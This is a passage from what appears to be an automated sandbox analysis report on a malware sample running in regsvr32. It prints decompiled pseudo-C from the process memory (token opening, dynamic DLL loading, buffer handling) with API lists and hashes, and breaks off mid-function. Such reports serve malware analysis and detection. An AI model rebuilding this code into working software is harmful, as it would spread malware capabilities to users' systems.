							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E05375FC0( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8341ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xed7505f9
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xbde85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8341ffff
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E05375FC0(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0xfed1e900
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xbde85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
                                                                                                                                                                        						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                                                                                                                        						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                                                                                                                        							L49:
                                                                                                                                                                        							__eflags = _t235 - _t258;
                                                                                                                                                                        							_t154 =  >  ? _t258 : _t235;
                                                                                                                                                                        							_a4 =  >  ? _t258 : _t235;
                                                                                                                                                                        							__eflags = _t222 - 4;
                                                                                                                                                                        							if(_t222 != 4) {
                                                                                                                                                                        								L53:
                                                                                                                                                                        								_t269 = 0;
                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t161 =  *_t272;
                                                                                                                                                                        								__eflags =  *(_t161 + 4);
                                                                                                                                                                        								_t154 = _a4;
                                                                                                                                                                        								if( *(_t161 + 4) != 0) {
                                                                                                                                                                        									goto L53;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									__eflags = _t154 - _t235;
                                                                                                                                                                        									if(_t154 != _t235) {
                                                                                                                                                                        										goto L53;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t269 = _t222 - 3;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        							_t132 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        							E05377120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                                                                                                                        							_t134 = _t272 + 0x5c;
                                                                                                                                                                        							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                                                                                        							__eflags =  *_t134;
                                                                                                                                                                        							E05375E80( *_t134,  *_t272);
                                                                                                                                                                        						} else {
                                                                                                                                                                        							__eflags = _t235;
                                                                                                                                                                        							if(_t235 != 0) {
                                                                                                                                                                        								L46:
                                                                                                                                                                        								__eflags = _t222;
                                                                                                                                                                        								if(_t222 != 0) {
                                                                                                                                                                        									_t162 =  *_t272;
                                                                                                                                                                        									__eflags =  *(_t162 + 4);
                                                                                                                                                                        									if( *(_t162 + 4) == 0) {
                                                                                                                                                                        										__eflags = _t235 - _t258;
                                                                                                                                                                        										if(_t235 <= _t258) {
                                                                                                                                                                        											goto L49;
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								__eflags = _t222 - 4;
                                                                                                                                                                        								if(_t222 == 4) {
                                                                                                                                                                        									goto L46;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						asm("sbb edi, edi");
                                                                                                                                                                        						_t271 =  ~_t269 & 0x00000002;
                                                                                                                                                                        						__eflags = _t271;
                                                                                                                                                                        						return _t271;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						__eflags = _t218 - 4;
                                                                                                                                                                        						if(_t218 == 4) {
                                                                                                                                                                        							goto L34;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t173 =  *_t272;
                                                                                                                                                                        							__eflags =  *(_t173 + 4);
                                                                                                                                                                        							if( *(_t173 + 4) != 0) {
                                                                                                                                                                        								goto L34;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t88 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        								__eflags = _t254 -  *_t88;
                                                                                                                                                                        								if(_t254 !=  *_t88) {
                                                                                                                                                                        									goto L34;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									return 1;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					return 3;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

                                                                                                                                                                        0x0537425e
                                                                                                                                                                        0x05374261
                                                                                                                                                                        0x05374264
                                                                                                                                                                        0x0537430f
                                                                                                                                                                        0x0537430f
                                                                                                                                                                        0x0537426a
                                                                                                                                                                        0x0537426a
                                                                                                                                                                        0x0537426a
                                                                                                                                                                        0x0537426f
                                                                                                                                                                        0x05374299
                                                                                                                                                                        0x0537429c
                                                                                                                                                                        0x0537429c
                                                                                                                                                                        0x053742a1
                                                                                                                                                                        0x053742a3
                                                                                                                                                                        0x053742a5
                                                                                                                                                                        0x053742a8
                                                                                                                                                                        0x053742ab
                                                                                                                                                                        0x053742b3
                                                                                                                                                                        0x053742b8
                                                                                                                                                                        0x053742b8
                                                                                                                                                                        0x053742be
                                                                                                                                                                        0x053742c1
                                                                                                                                                                        0x053742c4
                                                                                                                                                                        0x053742c7
                                                                                                                                                                        0x053742c9
                                                                                                                                                                        0x053742c9
                                                                                                                                                                        0x053742ca
                                                                                                                                                                        0x053742ca
                                                                                                                                                                        0x053742c7
                                                                                                                                                                        0x053742d8
                                                                                                                                                                        0x053742db
                                                                                                                                                                        0x053742df
                                                                                                                                                                        0x053742e4
                                                                                                                                                                        0x053742e7
                                                                                                                                                                        0x053742ea
                                                                                                                                                                        0x053742ea
                                                                                                                                                                        0x053742ea
                                                                                                                                                                        0x053742ed
                                                                                                                                                                        0x053742ed
                                                                                                                                                                        0x053742f0
                                                                                                                                                                        0x053742f0
                                                                                                                                                                        0x05374271
                                                                                                                                                                        0x05374271
                                                                                                                                                                        0x05374281
                                                                                                                                                                        0x05374284
                                                                                                                                                                        0x05374289
                                                                                                                                                                        0x05374289
                                                                                                                                                                        0x0537428c
                                                                                                                                                                        0x0537428f
                                                                                                                                                                        0x05374292
                                                                                                                                                                        0x05374294
                                                                                                                                                                        0x05374294
                                                                                                                                                                        0x053742f3
                                                                                                                                                                        0x053742f5
                                                                                                                                                                        0x053742f8
                                                                                                                                                                        0x053742f8
                                                                                                                                                                        0x053742fe
                                                                                                                                                                        0x05374302
                                                                                                                                                                        0x05374305
                                                                                                                                                                        0x05374307
                                                                                                                                                                        0x05374307
                                                                                                                                                                        0x05374318
                                                                                                                                                                        0x0537431a
                                                                                                                                                                        0x0537431a
                                                                                                                                                                        0x05374322
                                                                                                                                                                        0x05374330
                                                                                                                                                                        0x05374333
                                                                                                                                                                        0x05374335
                                                                                                                                                                        0x05374355
                                                                                                                                                                        0x05374355
                                                                                                                                                                        0x05374358
                                                                                                                                                                        0x0537435e
                                                                                                                                                                        0x0537435f
                                                                                                                                                                        0x05374362
                                                                                                                                                                        0x05374364
                                                                                                                                                                        0x05374367
                                                                                                                                                                        0x0537436a
                                                                                                                                                                        0x0537436d
                                                                                                                                                                        0x05374371
                                                                                                                                                                        0x05374374
                                                                                                                                                                        0x05374377
                                                                                                                                                                        0x0537437a
                                                                                                                                                                        0x0537437c
                                                                                                                                                                        0x0537437c
                                                                                                                                                                        0x0537437f
                                                                                                                                                                        0x05374381
                                                                                                                                                                        0x05374381
                                                                                                                                                                        0x05374384
                                                                                                                                                                        0x05374386
                                                                                                                                                                        0x05374389
                                                                                                                                                                        0x05374391
                                                                                                                                                                        0x05374394
                                                                                                                                                                        0x05374399
                                                                                                                                                                        0x05374399
                                                                                                                                                                        0x0537439f
                                                                                                                                                                        0x053743a2
                                                                                                                                                                        0x053743a5
                                                                                                                                                                        0x053743a7
                                                                                                                                                                        0x053743a7
                                                                                                                                                                        0x053743a8
                                                                                                                                                                        0x053743a8
                                                                                                                                                                        0x053743b3
                                                                                                                                                                        0x053743b3
                                                                                                                                                                        0x053743b3
                                                                                                                                                                        0x053743b6
                                                                                                                                                                        0x053743b9
                                                                                                                                                                        0x053743b9
                                                                                                                                                                        0x053743bc
                                                                                                                                                                        0x053743bc
                                                                                                                                                                        0x0537437f
                                                                                                                                                                        0x053743bf
                                                                                                                                                                        0x053743c2
                                                                                                                                                                        0x053743c5
                                                                                                                                                                        0x053743c7
                                                                                                                                                                        0x053743ca
                                                                                                                                                                        0x053743cc
                                                                                                                                                                        0x053743cf
                                                                                                                                                                        0x053743d2
                                                                                                                                                                        0x053743d4
                                                                                                                                                                        0x053743d7
                                                                                                                                                                        0x053743df
                                                                                                                                                                        0x053743e7
                                                                                                                                                                        0x053743ea
                                                                                                                                                                        0x053743ea
                                                                                                                                                                        0x053743ea
                                                                                                                                                                        0x053743ed
                                                                                                                                                                        0x053743ed
                                                                                                                                                                        0x053743ed
                                                                                                                                                                        0x053743f0
                                                                                                                                                                        0x053743f6
                                                                                                                                                                        0x053743f8
                                                                                                                                                                        0x053743f8
                                                                                                                                                                        0x053743fe
                                                                                                                                                                        0x05374404
                                                                                                                                                                        0x0537440d
                                                                                                                                                                        0x05374414
                                                                                                                                                                        0x05374416
                                                                                                                                                                        0x05374419
                                                                                                                                                                        0x05374419
                                                                                                                                                                        0x0537441c
                                                                                                                                                                        0x0537441c
                                                                                                                                                                        0x0537441f
                                                                                                                                                                        0x05374421
                                                                                                                                                                        0x05374424
                                                                                                                                                                        0x05374426
                                                                                                                                                                        0x05374441
                                                                                                                                                                        0x05374441
                                                                                                                                                                        0x05374445
                                                                                                                                                                        0x05374448
                                                                                                                                                                        0x0537444b
                                                                                                                                                                        0x0537444e
                                                                                                                                                                        0x05374464
                                                                                                                                                                        0x05374464
                                                                                                                                                                        0x05374464
                                                                                                                                                                        0x05374450

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                        • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction ID: 7dc343ceaa4820eec73f6905f753709d3c383a36b51712e1561a3d9976eebd24
                                                                                                                                                                        • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction Fuzzy Hash: 66D11271A007089FDB34CF69D8C4A6AB7E6FF88304B24896DE88AC7701D775F9548B51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0536C79E(void* __ecx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _t10;
                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                        
                                                                                                                                                                        				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					_t10 = _v8;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					if(GetLastError() != 0x3f0) {
                                                                                                                                                                        						L3:
                                                                                                                                                                        						_t10 = 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t13 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
                                                                                                                                                                        							goto L4;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							goto L3;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t10;
                                                                                                                                                                        			}







                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0536C7B1
                                                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,0536C8E3,00000000,05360000), ref: 0536C7B8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,0536C8E3,00000000,05360000), ref: 0536C7BF
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,0536C8E3,00000000,05360000), ref: 0536C7E4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1515895013-0
                                                                                                                                                                        • Opcode ID: a4c8817edeea00bd7feffa2853146659acbe7b8c38ee752181bd4d508ac69b6e
                                                                                                                                                                        • Instruction ID: a70bf0bbd99bd55c4209a71c5fec36e7b21298d3f0b92b597d05d6d100302525
                                                                                                                                                                        • Opcode Fuzzy Hash: a4c8817edeea00bd7feffa2853146659acbe7b8c38ee752181bd4d508ac69b6e
                                                                                                                                                                        • Instruction Fuzzy Hash: C3F0D07291021DEFDB119BA5D84AFAA7BFCFB0C754F044458F652D7440DB60E9408791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E0536D218(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				char _v140;
                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                        				char _t15;
                                                                                                                                                                        				intOrPtr _t20;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                        				WCHAR* _t34;
                                                                                                                                                                        				intOrPtr _t35;
                                                                                                                                                                        				struct HINSTANCE__* _t37;
                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                        				void* _t47;
                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                        				void* _t60;
                                                                                                                                                                        				void* _t61;
                                                                                                                                                                        				char _t62;
                                                                                                                                                                        				void* _t65;
                                                                                                                                                                        				intOrPtr _t66;
                                                                                                                                                                        				char _t68;
                                                                                                                                                                        
                                                                                                                                                                        				_t65 = __esi;
                                                                                                                                                                        				_t61 = __edi;
                                                                                                                                                                        				_t47 = __ebx;
                                                                                                                                                                        				_t50 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        				_t1 = _t50 + 0x1898; // 0x0
                                                                                                                                                                        				_t14 =  *_t1;
                                                                                                                                                                        				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                                                                                                                                                        					_t15 = E05369DF2(_t50, 0x392);
                                                                                                                                                                        					_t66 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        					_t62 = _t15;
                                                                                                                                                                        					_t67 = _t66 + 0xb0;
                                                                                                                                                                        					_v8 = _t62;
                                                                                                                                                                        					E05369E51( &_v140, 0x40, L"%08x", E0536E2C5(_t66 + 0xb0, E0536A43D(_t66 + 0xb0), 0));
                                                                                                                                                                        					_t20 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        					_t7 = _t20 + 0xa8; // 0x1
                                                                                                                                                                        					asm("sbb eax, eax");
                                                                                                                                                                        					_t25 = E05369DF2(_t67, ( ~( *_t7) & 0x00000a0b) + 0xf8);
                                                                                                                                                                        					_t26 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        					_t68 = E05369A5A(_t26 + 0x1020);
                                                                                                                                                                        					_v12 = _t68;
                                                                                                                                                                        					E05368BAF( &_v8);
                                                                                                                                                                        					_t32 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        					_t34 = E05369A5A(_t32 + 0x122a);
                                                                                                                                                                        					 *0x537f91c = _t34;
                                                                                                                                                                        					_t35 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x537c9a0,  &_v140, ".", L"dll", 0, 0x537c9a0, _t25, 0x537c9a0, _t62, 0, _t61, _t65, _t47);
                                                                                                                                                                        					_t37 = LoadLibraryW( *0x537f91c);
                                                                                                                                                                        					 *0x537f914 = _t37;
                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                        						_t38 = 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_push(_t37);
                                                                                                                                                                        						_t60 = 0x28;
                                                                                                                                                                        						_t38 = E0536F011(0x537cb8c, _t60);
                                                                                                                                                                        					}
                                                                                                                                                                        					 *0x537f918 = _t38;
                                                                                                                                                                        					E05368BF4( &_v12, 0xfffffffe);
                                                                                                                                                                        					E05368D6D( &_v140, 0, 0x80);
                                                                                                                                                                        					if( *0x537f918 != 0) {
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						E05368BF4(0x537f91c, 0xfffffffe);
                                                                                                                                                                        						goto L8;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					L8:
                                                                                                                                                                        					if( *0x537f918 == 0) {
                                                                                                                                                                        						_t46 =  *0x537f850; // 0x546f9f0
                                                                                                                                                                        						 *0x537f918 = _t46;
                                                                                                                                                                        					}
                                                                                                                                                                        					L10:
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID: %08x$dll
                                                                                                                                                                        • API String ID: 1029625771-2963171978
                                                                                                                                                                        • Opcode ID: 831125fc99a2aab5942f86d5726ff00588434c4e69d0161829a36a1480cc1003
                                                                                                                                                                        • Instruction ID: 07cc8c0c7cd752c66e8a5f162d673099007891acef7b50a5c73fab362add4c16
                                                                                                                                                                        • Opcode Fuzzy Hash: 831125fc99a2aab5942f86d5726ff00588434c4e69d0161829a36a1480cc1003
                                                                                                                                                                        • Instruction Fuzzy Hash: 383173B2B50108BFD720AB68EC4AFAA77EDF746314F14C139F004D7184EE74998587A5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E05373674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                        				char _v5;
                                                                                                                                                                        				long long _v12;
                                                                                                                                                                        				short _v20;
                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                        				void* _t16;
                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                        				char _t25;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        				char** _t32;
                                                                                                                                                                        				long long _t40;
                                                                                                                                                                        				long long _t41;
                                                                                                                                                                        
                                                                                                                                                                        				_t40 = __fp0;
                                                                                                                                                                        				_t15 = E0537358D(_a4);
                                                                                                                                                                        				 *_t32 = "msxml3.dll";
                                                                                                                                                                        				_t28 = _t15 & 0x0fffffff;
                                                                                                                                                                        				_t16 = E0536A43D();
                                                                                                                                                                        				_t26 = 0xf;
                                                                                                                                                                        				_t25 = 0;
                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                        				if(_t16 > _t26) {
                                                                                                                                                                        					L2:
                                                                                                                                                                        					_t3 = _t25 + 0x41; // 0x41
                                                                                                                                                                        					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
                                                                                                                                                                        					_t25 = _t25 + 1;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t26 = _t16;
                                                                                                                                                                        					if(_t26 != 0) {
                                                                                                                                                                        						do {
                                                                                                                                                                        							goto L2;
                                                                                                                                                                        						} while (_t25 < _t26);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				lstrlenW( &_v20);
                                                                                                                                                                        				_t29 = _a8;
                                                                                                                                                                        				_t22 = _a12 - _t29 + 1;
                                                                                                                                                                        				_a12 = _t22;
                                                                                                                                                                        				asm("fild dword [ebp+0x10]");
                                                                                                                                                                        				if(_t22 < 0) {
                                                                                                                                                                        					_t40 = _t40 +  *0x537cf58;
                                                                                                                                                                        				}
                                                                                                                                                                        				_a12 = _t28;
                                                                                                                                                                        				_v12 = _t40;
                                                                                                                                                                        				_t41 = _v12;
                                                                                                                                                                        				asm("fild dword [ebp+0x10]");
                                                                                                                                                                        				if(_t28 < 0) {
                                                                                                                                                                        					_t41 = _t41 +  *0x537cf58;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v12 = _t41;
                                                                                                                                                                        				asm("fmulp st1, st0");
                                                                                                                                                                        				L05378935();
                                                                                                                                                                        				return _t29 - _t22;
                                                                                                                                                                        			}


















                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 053736BB
                                                                                                                                                                        • _ftol2_sse.MSVCRT ref: 053736FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _ftol2_sselstrlen
                                                                                                                                                                        • String ID: msxml3.dll
                                                                                                                                                                        • API String ID: 1292649733-2158035192
                                                                                                                                                                        • Opcode ID: 70242a3cc234ed20180fc4216fdb852dcc73d96dbc909186fa67038a29e3e3ea
                                                                                                                                                                        • Instruction ID: a0badae73ccbc4f56beea4f3e351505be38c7f8264bf4298eef768ce07a84341
                                                                                                                                                                        • Opcode Fuzzy Hash: 70242a3cc234ed20180fc4216fdb852dcc73d96dbc909186fa67038a29e3e3ea
                                                                                                                                                                        • Instruction Fuzzy Hash: 62112532F0424DABCF20AF68E8495AD7FB9FF94310F228A59E81596245EF34C1608785
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                        			E05B9D447(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				long _v24;
                                                                                                                                                                        				long _v28;
                                                                                                                                                                        				short _v32;
                                                                                                                                                                        				char _v36;
                                                                                                                                                                        				intOrPtr* _v40;
                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                        				long _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				void* _v53;
                                                                                                                                                                        				char _v64;
                                                                                                                                                                        				short _v68;
                                                                                                                                                                        				struct _WNDCLASSEXA _v116;
                                                                                                                                                                        				char _t81;
                                                                                                                                                                        				intOrPtr* _t83;
                                                                                                                                                                        				intOrPtr _t87;
                                                                                                                                                                        				intOrPtr _t90;
                                                                                                                                                                        				char _t97;
                                                                                                                                                                        				short _t98;
                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                        				long _t107;
                                                                                                                                                                        				char _t119;
                                                                                                                                                                        				void* _t124;
